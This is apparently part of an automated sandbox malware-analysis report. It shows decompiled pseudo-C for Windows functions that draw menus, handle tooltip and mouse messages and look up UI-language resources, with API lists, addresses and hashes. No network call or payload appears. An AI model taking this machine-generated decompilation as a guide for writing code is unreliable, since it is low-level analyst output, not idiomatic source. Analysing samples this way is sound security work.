						_push(_t400 - 0x14);
						_push( *((intOrPtr*)(_t400 - 0x38)));
						E00414C81(0, 0x43ea08, _t399, _t417);
						goto L30;
					} else {
						 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
						 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x2c))(GetSysColor(0xd));
						if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000002) == 0) {
							_t313 = GetSysColor(0xe);
						} else {
							_t313 =  *(_t400 - 0x1c);
						}
						_t388 =  *_t399;
						 *((intOrPtr*)(_t388 + 0x30))(_t313);
						L23:
						_push(0);
						_push(_t400 - 0x30);
						_push(0);
						asm("cdq");
						asm("cdq");
						_push(2);
						_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) - ( *((intOrPtr*)(_t400 - 0x40)) - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x28)));
						L24:
						_push( *((intOrPtr*)(_t400 - 0x24)) + 3);
						E0041F86F(_t399);
						goto L25;
					}
				}
			}





















                  0x0041fa76
                  0x0041fa76
                  0x0041fa80
                  0x0041fa85
                  0x0041fa90
                  0x0041fa95
                  0x0041fa9d
                  0x0041faa5
                  0x0041fab0
                  0x0041fabb
                  0x0041fad5
                  0x0041fadf
                  0x0041fae9
                  0x0041faec
                  0x0041faf2
                  0x0041faf4
                  0x0041faff
                  0x0041fb04
                  0x0041fb11
                  0x0041fb2d
                  0x0041fb30
                  0x0041fb30
                  0x0041fb3f
                  0x0041fb42
                  0x0041fb47
                  0x0041fb4c
                  0x0041fb7e
                  0x0041fb89
                  0x0041fb8b
                  0x0041fb5e
                  0x0041fb67
                  0x0041fb6e
                  0x0041fb74
                  0x0041fb77
                  0x0041fb77
                  0x0041fb91
                  0x0041fb9c
                  0x0041fba3
                  0x0041fbaf
                  0x0041fbba
                  0x0041fbc3
                  0x0041fbc6
                  0x0041fbc9
                  0x0041fbd4
                  0x0041fbd7
                  0x0041fbe3
                  0x0041fbe7
                  0x0041fbf7
                  0x0041fc04
                  0x0041fc0e
                  0x0041fc11
                  0x0041fc18
                  0x0041fc1b
                  0x0041fcca
                  0x0041fcd6
                  0x0041fcdc
                  0x0041fcdf
                  0x0041fce1
                  0x0041fd72
                  0x0041fd75
                  0x0041fd77
                  0x0041fd79
                  0x0041fd83
                  0x0041fd8c
                  0x0041fd8f
                  0x0041fd94
                  0x0041fd9f
                  0x0041fda9
                  0x0041fda9
                  0x0041fd79
                  0x0041fdae
                  0x0041fdb1
                  0x00000000
                  0x0041fdb3
                  0x0041fdba
                  0x0041fdc1
                  0x0041fdcc
                  0x00000000
                  0x0041fdcc
                  0x0041fdb1
                  0x0041fceb
                  0x0041fcf6
                  0x0041fcfd
                  0x0041fd02
                  0x0041fd05
                  0x00000000
                  0x00000000
                  0x0041fd11
                  0x0041fd14
                  0x0041fd17
                  0x0041fd24
                  0x0041fd3d
                  0x0041fd46
                  0x0041fd51
                  0x0041fd54
                  0x0041fd58
                  0x0041fd5f
                  0x0041fd60
                  0x0041fd68
                  0x0041fd6c
                  0x00000000
                  0x0041fc21
                  0x0041fc28
                  0x0041fc35
                  0x0041fc41
                  0x0041fc49
                  0x0041fc5c
                  0x0041fc65
                  0x0041fc68
                  0x0041fc82
                  0x0041fc82
                  0x0041fc8a
                  0x0041fe00
                  0x0041fe03
                  0x0041feb8
                  0x0041febf
                  0x0041fec8
                  0x0041fecb
                  0x0041fee0
                  0x0041fee0
                  0x0041fe0e
                  0x0041fe11
                  0x0041fe17
                  0x0041fe1a
                  0x0041fe1e
                  0x0041fe20
                  0x0041fe33
                  0x0041fe35
                  0x0041fe51
                  0x0041fe54
                  0x0041fe5d
                  0x0041fe61
                  0x0041fe6c
                  0x0041fe79
                  0x0041fe98
                  0x0041fea0
                  0x0041fea4
                  0x0041feac
                  0x0041feb0
                  0x0041feb3
                  0x00000000
                  0x0041feb3
                  0x0041fe37
                  0x0041fe3c
                  0x0041fe42
                  0x0041fe43
                  0x0041fe46
                  0x0041fe4b
                  0x0041fe4e
                  0x00000000
                  0x0041fe4e
                  0x0041fe22
                  0x0041fe28
                  0x0041fe29
                  0x0041fe2c
                  0x00000000
                  0x0041fc90
                  0x0041fc94
                  0x0041fc9f
                  0x0041fca9
                  0x0041fcb2
                  0x0041fcab
                  0x0041fcab
                  0x0041fcab
                  0x0041fcb4
                  0x0041fcb9
                  0x0041fdcf
                  0x0041fdcf
                  0x0041fdd3
                  0x0041fdda
                  0x0041fddb
                  0x0041fde3
                  0x0041fdef
                  0x0041fdf1
                  0x0041fdf2
                  0x0041fdf8
                  0x0041fdfb
                  0x00000000
                  0x0041fdfb
                  0x0041fc8a

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041FA80
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  • _memset.LIBCMT ref: 0041FABB
                  • GetMenuItemInfoW.USER32 ref: 0041FAEC
                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0041FB22
                  • GetObjectW.GDI32(?,00000018,?), ref: 0041FB6E
                  • GetSystemMetrics.USER32(00000032), ref: 0041FB81
                  • GetSystemMetrics.USER32(00000031), ref: 0041FB8B
                  • GetSysColor.USER32(00000004), ref: 0041FBCC
                  • GetSysColor.USER32(0000000D), ref: 0041FC38
                  • GetSysColor.USER32(00000010), ref: 0041FC68
                  • GetSysColor.USER32(00000014), ref: 0041FC6D
                  • GetSysColor.USER32(0000000D), ref: 0041FC97
                  • GetSysColor.USER32(0000000E), ref: 0041FCB2
                    • Part of subcall function 00421A9A: SetBkColor.GDI32(?,?), ref: 00421ABE
                    • Part of subcall function 00421A9A: ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00421AD1
                  • GetSysColor.USER32(00000014), ref: 0041FCEE
                    • Part of subcall function 00413F50: SetBkMode.GDI32(?,?), ref: 00413F6D
                    • Part of subcall function 00413F50: SetBkMode.GDI32(?,?), ref: 00413F7A
                    • Part of subcall function 0041F86F: ExtTextOutW.GDI32(?,?,?,?,?,?,?,?), ref: 0041F890
                  • GetSysColor.USER32(00000011), ref: 0041FD49
                  • GetSysColor.USER32(00000014), ref: 0041FD8F
                  • GetSysColor.USER32(00000010), ref: 0041FD94
                  • GetSysColor.USER32(00000007), ref: 0041FDC4
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0041FE79
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$H_prolog3InfoItemMenuMetricsModeSystemText$AllocatorDebugHeapInflateObjectRect_memset
                  • String ID: 0$@$BAA$tC
                  • API String ID: 1068847707-438587363
                  • Opcode ID: 1c84f6ecd1dcc19654c694ace591c06d12c55800a49cd53d1384043263fda5c0
                  • Instruction ID: eda40932cf3d49eb725eaa5344293dbe4309d1e7163b6a347a27f5c3417c4cb1
                  • Opcode Fuzzy Hash: 1c84f6ecd1dcc19654c694ace591c06d12c55800a49cd53d1384043263fda5c0
                  • Instruction Fuzzy Hash: 46F13971A00219AFCF04DFA9CD85EEEBBB9BF48304F14411AF505A7291DB34AA45CF64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00427129, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 323windowkeyboardUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00427129(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t114;
				signed int _t116;
				signed int _t118;
				intOrPtr _t122;
				long _t131;
				signed int _t138;
				signed int _t139;
				void* _t143;
				signed int _t147;
				signed int _t148;
				void* _t156;
				intOrPtr* _t163;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				void* _t181;
				signed short _t190;
				intOrPtr _t192;
				void* _t200;
				void* _t204;
				void* _t205;
				void* _t207;

				_t165 = __ecx;
				_push(0x7c);
				_t109 = E0042922B(E004399AB, __ebx, __edi, __esi);
				_t200 = __ecx;
				 *(_t204 - 0x10) = __ecx;
				_t163 =  *((intOrPtr*)(_t204 + 8));
				_t190 =  *(_t163 + 4);
				 *(_t204 - 0x1c) = _t190;
				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
						L49:
						_t190 =  *(_t204 - 0x1c);
						goto L50;
					} else {
						_t109 = GetKeyState(4);
						_t217 = _t109;
						if(_t109 < 0) {
							goto L49;
						} else {
							_t114 = E00420870(_t163, _t165, GetKeyState, _t200, _t217);
							_push( *_t163);
							_t192 = _t114;
							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
							while(1) {
								_t109 = E0040E20E(_t163, _t165);
								if(_t109 == 0) {
									break;
								}
								__eflags =  *(_t109 + 0x3c) & 0x00000401;
								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
									break;
								} else {
									_push(GetParent( *(_t109 + 0x20)));
									continue;
								}
							}
							if(_t109 == _t200) {
								_t164 =  *(_t192 + 0x3c);
								 *(_t204 - 0x14) = E0040E514(_t200);
								__eflags = _t164;
								if(__eflags == 0) {
									L19:
									_t116 = E0040B71F(__eflags, 0x70);
									 *(_t204 - 0x1c) = _t116;
									_t164 = 0;
									 *(_t204 - 4) = 0;
									__eflags = _t116;
									if(__eflags != 0) {
										_t164 = E00426E40(0, _t116, _t192, _t200, __eflags);
									}
									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
									_t118 =  *((intOrPtr*)( *_t164 + 0x13c))( *(_t204 - 0x14), 1);
									__eflags = _t118;
									if(_t118 != 0) {
										SendMessageW( *(_t164 + 0x20), 0x401, 0, 0);
										_t200 =  *(_t204 - 0x10);
										 *(_t192 + 0x3c) = _t164;
										L24:
										E004281D0(_t192, _t204 - 0x88, 0, 0x30);
										_t122 =  *((intOrPtr*)(_t204 + 8));
										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
										 *(_t204 - 0x28) =  *(_t122 + 0x14);
										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
										E004281D0(_t192, _t204 - 0x58, 0, 0x30);
										_t207 = _t205 + 0x18;
										 *(_t204 - 0x58) = 0x2c;
										_t109 =  *((intOrPtr*)( *_t200 + 0x74))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
										asm("sbb ecx, ecx");
										_t175 =  ~(_t109 + 1) & _t200;
										 *(_t204 - 0x1c) = _t109;
										 *(_t204 - 0x14) = _t175;
										__eflags =  *(_t192 + 0x44) - _t109;
										if( *(_t192 + 0x44) != _t109) {
											L30:
											__eflags = _t109 - 0xffffffff;
											if(_t109 == 0xffffffff) {
												SendMessageW( *(_t164 + 0x20), 0x401, 0, 0);
												L39:
												E004270A9(_t164,  *((intOrPtr*)(_t204 + 8)));
												_t131 =  *(_t192 + 0x48);
												__eflags = _t131;
												if(_t131 != 0) {
													__eflags =  *_t131 - 0x2c;
													if( *_t131 >= 0x2c) {
														SendMessageW( *(_t164 + 0x20), 0x433, 0, _t131);
													}
												}
												 *(_t192 + 0x40) =  *(_t204 - 0x14);
												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
												__eflags =  *(_t192 + 0x48);
												if(__eflags == 0) {
													 *(_t192 + 0x48) = E0040B71F(__eflags, 0x30);
													E004281D0(_t192, _t134, 0, 0x30);
													_t207 = _t207 + 0x10;
												}
												_t176 = 0xc;
												_t200 = _t204 - 0x58;
												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
												_t192 = _t200 + _t176 + _t176;
												L45:
												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
													__eflags =  *(_t204 - 0x38);
													if(__eflags == 0) {
														_push( *((intOrPtr*)(_t204 - 0x34)));
														_t109 = E00428397(_t164, _t192, _t200, __eflags);
													}
												}
												goto L77;
											}
											_t179 = 0xc;
											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
											_t207 = _t207 + 0xc;
											_t181 =  *(_t204 - 0x10);
											_t139 = _t138 & 0x3fffffff;
											 *(_t204 - 0x84) = _t139;
											__eflags =  *(_t181 + 0x3c) & 0x00000400;
											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
												_t148 = _t139 | 0x00000020;
												__eflags = _t148;
												 *(_t204 - 0x84) = _t148;
											}
											SendMessageW( *(_t164 + 0x20), 0x432, 0, _t204 - 0x88);
											__eflags =  *(_t204 - 0x54) & 0x40000000;
											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
												L35:
												SendMessageW( *(_t164 + 0x20), 0x401, 1, 0);
												_t143 =  *(_t204 - 0x10);
												__eflags =  *(_t143 + 0x3c) & 0x00000400;
												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
													SendMessageW( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
												}
												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
												goto L38;
											} else {
												_t147 = E00410A43(_t164,  *(_t204 - 0x10));
												__eflags = _t147;
												if(_t147 == 0) {
													L38:
													_t192 =  *((intOrPtr*)(_t204 - 0x18));
													goto L39;
												}
												goto L35;
											}
										}
										__eflags =  *(_t192 + 0x40) - _t175;
										if( *(_t192 + 0x40) != _t175) {
											goto L30;
										}
										__eflags =  *(_t200 + 0x3c) & 0x00000400;
										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
											__eflags = _t109 - 0xffffffff;
											if(_t109 != 0xffffffff) {
												_t109 = E004270A9(_t164,  *((intOrPtr*)(_t204 + 8)));
											}
										} else {
											GetCursorPos(_t204 - 0x20);
											_t109 = SendMessageW( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
										}
										goto L45;
									} else {
										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
										goto L77;
									}
								}
								_t156 = E0040F5D8(_t164);
								__eflags = _t156 -  *(_t204 - 0x14);
								if(_t156 !=  *(_t204 - 0x14)) {
									 *((intOrPtr*)( *_t164 + 0x60))();
									 *((intOrPtr*)( *_t164 + 4))(1);
									_t164 = 0;
									__eflags = 0;
									 *(_t192 + 0x3c) = 0;
								}
								__eflags = _t164;
								if(__eflags != 0) {
									goto L24;
								} else {
									goto L19;
								}
							} else {
								if(_t109 == 0) {
									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
								}
								goto L77;
							}
						}
					}
				} else {
					L50:
					__eflags =  *(_t200 + 0x3c) & 0x00000401;
					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
						L77:
						return E00429303(_t109);
					}
					_push( *_t163);
					while(1) {
						_t109 = E0040E20E(_t163, _t165);
						__eflags = _t109;
						if(_t109 == 0) {
							break;
						}
						__eflags = _t109 - _t200;
						if(_t109 == _t200) {
							L57:
							__eflags = _t190 - 0x100;
							if(_t190 < 0x100) {
								L59:
								__eflags = _t190 - 0x104 - 3;
								if(_t190 - 0x104 > 3) {
									_t109 = 0;
									__eflags = 0;
									L62:
									__eflags =  *(_t200 + 0x3c) & 0x00000400;
									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
										goto L77;
									}
									__eflags = _t109;
									if(__eflags != 0) {
										L76:
										_t109 = E0040CE8F(_t165, __eflags, _t109);
										goto L77;
									}
									__eflags = _t190 - 0x201;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x203;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x204;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x206;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x207;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x209;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa1;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa3;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa4;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa6;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa7;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa9;
									if(__eflags != 0) {
										goto L77;
									}
									goto L76;
								}
								L60:
								_t109 = 1;
								goto L62;
							}
							__eflags = _t190 - 0x109;
							if(_t190 <= 0x109) {
								goto L60;
							}
							goto L59;
						}
						__eflags =  *(_t109 + 0x3c) & 0x00000401;
						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t109 + 0x20)));
					}
					__eflags = _t109 - _t200;
					if(_t109 != _t200) {
						goto L77;
					}
					goto L57;
				}
			}

























                  0x00427129
                  0x00427129
                  0x00427130
                  0x00427135
                  0x00427137
                  0x0042713a
                  0x0042713d
                  0x00427140
                  0x00427149
                  0x0042717c
                  0x0042746b
                  0x0042746b
                  0x00000000
                  0x0042718f
                  0x00427191
                  0x00427193
                  0x00427196
                  0x00000000
                  0x0042719c
                  0x0042719c
                  0x004271a1
                  0x004271a3
                  0x004271a5
                  0x004271bd
                  0x004271bd
                  0x004271c4
                  0x00000000
                  0x00000000
                  0x004271aa
                  0x004271b1
                  0x00000000
                  0x004271b3
                  0x004271bc
                  0x00000000
                  0x004271bc
                  0x004271b1
                  0x004271c8
                  0x004271de
                  0x004271e8
                  0x004271eb
                  0x004271ed
                  0x00427214
                  0x00427216
                  0x0042721c
                  0x0042721f
                  0x00427221
                  0x00427224
                  0x00427226
                  0x0042722f
                  0x0042722f
                  0x00427233
                  0x0042723e
                  0x00427244
                  0x00427246
                  0x00427262
                  0x00427268
                  0x0042726b
                  0x0042726e
                  0x00427279
                  0x0042727e
                  0x0042728a
                  0x00427294
                  0x00427297
                  0x004272a5
                  0x004272ac
                  0x004272bb
                  0x004272c2
                  0x004272ca
                  0x004272cc
                  0x004272ce
                  0x004272d1
                  0x004272d4
                  0x004272d7
                  0x0042732b
                  0x0042732b
                  0x0042732e
                  0x00427460
                  0x004273d9
                  0x004273dd
                  0x004273e2
                  0x004273e7
                  0x004273e9
                  0x004273eb
                  0x004273ee
                  0x004273fa
                  0x004273fa
                  0x004273ee
                  0x00427403
                  0x00427409
                  0x0042740c
                  0x0042740f
                  0x0042741c
                  0x0042741f
                  0x00427424
                  0x00427424
                  0x0042742c
                  0x0042742d
                  0x00427430
                  0x00427430
                  0x00427432
                  0x00427432
                  0x00427436
                  0x0042743c
                  0x00427440
                  0x00427446
                  0x00427449
                  0x0042744e
                  0x00427440
                  0x00000000
                  0x00427436
                  0x00427339
                  0x00427343
                  0x00427343
                  0x00427345
                  0x00427348
                  0x00427352
                  0x00427358
                  0x0042735b
                  0x0042735d
                  0x0042735d
                  0x00427360
                  0x00427360
                  0x00427378
                  0x0042737e
                  0x00427385
                  0x00427393
                  0x0042739e
                  0x004273a4
                  0x004273a7
                  0x004273aa
                  0x004273bd
                  0x004273bd
                  0x004273d0
                  0x00000000
                  0x00427387
                  0x0042738a
                  0x0042738f
                  0x00427391
                  0x004273d6
                  0x004273d6
                  0x00000000
                  0x004273d6
                  0x00000000
                  0x00427391
                  0x00427385
                  0x004272d9
                  0x004272dc
                  0x00000000
                  0x00000000
                  0x004272de
                  0x004272e5
                  0x00427314
                  0x00427317
                  0x00427321
                  0x00427321
                  0x004272e7
                  0x004272eb
                  0x00427309
                  0x00427309
                  0x00000000
                  0x00427248
                  0x0042724e
                  0x00000000
                  0x0042724e
                  0x00427246
                  0x004271f1
                  0x004271f6
                  0x004271f9
                  0x004271ff
                  0x00427208
                  0x0042720b
                  0x0042720b
                  0x0042720d
                  0x0042720d
                  0x00427210
                  0x00427212
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004271ca
                  0x004271cc
                  0x004271d2
                  0x004271d5
                  0x004271d5
                  0x00000000
                  0x004271cc
                  0x004271c8
                  0x00427196
                  0x0042746e
                  0x0042746e
                  0x0042746e
                  0x00427475
                  0x0042753c
                  0x00427541
                  0x00427541
                  0x0042747b
                  0x00427496
                  0x00427496
                  0x0042749b
                  0x0042749d
                  0x00000000
                  0x00000000
                  0x0042747f
                  0x00427481
                  0x004274a7
                  0x004274a7
                  0x004274ad
                  0x004274b7
                  0x004274bd
                  0x004274c0
                  0x004274c7
                  0x004274c7
                  0x004274c9
                  0x004274c9
                  0x004274d0
                  0x00000000
                  0x00000000
                  0x004274d2
                  0x004274d4
                  0x00427536
                  0x00427537
                  0x00000000
                  0x00427537
                  0x004274d6
                  0x004274dc
                  0x00000000
                  0x00000000
                  0x004274de
                  0x004274e4
                  0x00000000
                  0x00000000
                  0x004274e6
                  0x004274ec
                  0x00000000
                  0x00000000
                  0x004274ee
                  0x004274f4
                  0x00000000
                  0x00000000
                  0x004274f6
                  0x004274fc
                  0x00000000
                  0x00000000
                  0x004274fe
                  0x00427504
                  0x00000000
                  0x00000000
                  0x00427506
                  0x0042750c
                  0x00000000
                  0x00000000
                  0x0042750e
                  0x00427514
                  0x00000000
                  0x00000000
                  0x00427516
                  0x0042751c
                  0x00000000
                  0x00000000
                  0x0042751e
                  0x00427524
                  0x00000000
                  0x00000000
                  0x00427526
                  0x0042752c
                  0x00000000
                  0x00000000
                  0x0042752e
                  0x00427534
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00427534
                  0x004274c2
                  0x004274c4
                  0x00000000
                  0x004274c4
                  0x004274af
                  0x004274b5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004274b5
                  0x00427483
                  0x0042748a
                  0x00000000
                  0x00000000
                  0x00427495
                  0x00427495
                  0x0042749f
                  0x004274a1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004274a1

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427130
                  • GetKeyState.USER32(00000001), ref: 00427177
                  • GetKeyState.USER32(00000002), ref: 00427184
                  • GetKeyState.USER32(00000004), ref: 00427191
                  • GetParent.USER32(?), ref: 004271B6
                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00427262
                  • _memset.LIBCMT ref: 00427279
                  • ScreenToClient.USER32(?,?), ref: 00427297
                  • _memset.LIBCMT ref: 004272A5
                  • GetCursorPos.USER32(?), ref: 004272EB
                  • SendMessageW.USER32(?,00000412,00000000,?), ref: 00427309
                  • SendMessageW.USER32(?,00000432,00000000,?), ref: 00427378
                  • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0042739E
                  • SendMessageW.USER32(?,00000411,00000001,?), ref: 004273BD
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 004273D0
                  • SendMessageW.USER32(?,00000433,00000000,?), ref: 004273FA
                  • _memset.LIBCMT ref: 0042741F
                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00427460
                  • GetParent.USER32(?), ref: 0042748F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                  • String ID: ,
                  • API String ID: 2864161637-3772416878
                  • Opcode ID: 25e2d9dbc58f162ad463248b352d55aa5e29997971bef67a01b960febd43a57a
                  • Instruction ID: e8292259f50bfa0b50ff85a85b3b8cca184b95d8ca5375fe5bd6b1bc9ff05af8
                  • Opcode Fuzzy Hash: 25e2d9dbc58f162ad463248b352d55aa5e29997971bef67a01b960febd43a57a
                  • Instruction Fuzzy Hash: A4C1ED71B04225AFDF209F64EC88BAEBBB5BF04310F91016BF945A72E1C7789850CB59
                  Uniqueness

                  Uniqueness Score: 37.75%

                  Function 0041D0F2, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E0041D0F2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t61;
				_Unknown_base(*)()* _t62;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t77;
				unsigned int _t80;
				signed short _t88;
				unsigned int _t89;
				_Unknown_base(*)()* _t96;
				signed short _t98;
				unsigned int _t99;
				signed int _t107;
				signed int _t119;
				signed int _t128;
				void* _t131;

				_push(0x260);
				E00429294(E0043921F, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t131 - 0x228)) =  *((intOrPtr*)(_t131 + 8));
				_t124 = 0;
				 *((intOrPtr*)(_t131 - 0x234)) =  *((intOrPtr*)(_t131 + 0xc));
				 *(_t131 - 0x224) = 0;
				 *(_t131 - 0x220) = 0;
				_t61 = GetModuleHandleW(L"kernel32.dll");
				_t107 = GetProcAddress;
				 *(_t131 - 0x238) = _t61;
				_t62 = GetProcAddress(_t61, "GetUserDefaultUILanguage");
				if(_t62 == 0) {
					_t63 = GetModuleHandleW(L"ntdll.dll");
					if(_t63 != 0) {
						 *(_t131 - 0x224) = 0;
						EnumResourceLanguagesW(_t63, 0x10, 1, E0041CA13, _t131 - 0x224);
						if( *(_t131 - 0x224) != 0) {
							_t80 =  *(_t131 - 0x224) & 0x0000ffff;
							_t124 = _t80 & 0x3ff;
							 *((intOrPtr*)(_t131 - 0x24c)) = ConvertDefaultLocale(_t80 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t124);
							 *((intOrPtr*)(_t131 - 0x248)) = ConvertDefaultLocale(_t124);
							 *(_t131 - 0x220) = 2;
						}
					}
				} else {
					_t88 =  *_t62() & 0x0000ffff;
					 *(_t131 - 0x224) = _t88;
					_t89 = _t88 & 0x0000ffff;
					_t124 = 0x3ff;
					_t119 = _t89 & 0x3ff;
					 *(_t131 - 0x220) = _t119;
					 *((intOrPtr*)(_t131 - 0x24c)) = ConvertDefaultLocale(_t89 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t119);
					 *((intOrPtr*)(_t131 - 0x248)) = ConvertDefaultLocale( *(_t131 - 0x220));
					 *(_t131 - 0x220) = 2;
					_t96 = GetProcAddress( *(_t131 - 0x238), "GetSystemDefaultUILanguage");
					if(_t96 != 0) {
						_t98 =  *_t96() & 0x0000ffff;
						 *(_t131 - 0x224) = _t98;
						_t99 = _t98 & 0x0000ffff;
						_t124 = _t99 & 0x3ff;
						 *((intOrPtr*)(_t131 - 0x244)) = ConvertDefaultLocale(_t99 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t124);
						 *((intOrPtr*)(_t131 - 0x240)) = ConvertDefaultLocale(_t124);
						 *(_t131 - 0x220) = 4;
					}
				}
				 *(_t131 - 0x220) = 1 +  *(_t131 - 0x220);
				 *((intOrPtr*)(_t131 +  *(_t131 - 0x220) * 4 - 0x24c)) = 0x800;
				 *((short*)(_t131 - 0x12)) = 0;
				 *((short*)(_t131 - 0x14)) = 0;
				_t127 = 0x400000;
				if(GetModuleFileNameW(0x400000, _t131 - 0x21c, 0x105) != 0) {
					_t124 = 0x20;
					_t107 = 0;
					E004281D0(_t124, _t131 - 0x26c, 0, _t124);
					 *(_t131 - 0x26c) = _t124;
					 *((intOrPtr*)(_t131 - 0x264)) = _t131 - 0x21c;
					 *((intOrPtr*)(_t131 - 0x258)) = 0x3e8;
					 *(_t131 - 0x250) = 0x400000;
					 *((intOrPtr*)(_t131 - 0x268)) = 0x88;
					E0041CA2D(_t131 - 0x230, 0xffffffff);
					 *(_t131 - 4) = 0;
					if(E0041CAE4(_t131 - 0x230, _t131 - 0x26c) != 0) {
						E0041CB1E(_t131 - 0x230);
					}
					_t128 = 0;
					if( *(_t131 - 0x220) <= _t107) {
						L13:
						_t127 = 0;
						goto L15;
					} else {
						while(1) {
							_t77 = E0041CEDC( *((intOrPtr*)(_t131 - 0x228)),  *((intOrPtr*)(_t131 - 0x234)),  *((intOrPtr*)(_t131 + _t128 * 4 - 0x24c)));
							if(_t77 != _t107) {
								_t127 = _t77;
								break;
							}
							_t128 = 1 + _t128;
							if(_t128 <  *(_t131 - 0x220)) {
								continue;
							}
							goto L13;
						}
						L15:
						 *(_t131 - 4) =  *(_t131 - 4) | 0xffffffff;
						E0041CFA8(_t131 - 0x230);
						goto L7;
					}
				}
				L7:
				return E00429317(_t107, _t124, _t127);
			}

















                  0x0041d0f2
                  0x0041d0fc
                  0x0041d10a
                  0x0041d113
                  0x0041d11a
                  0x0041d120
                  0x0041d126
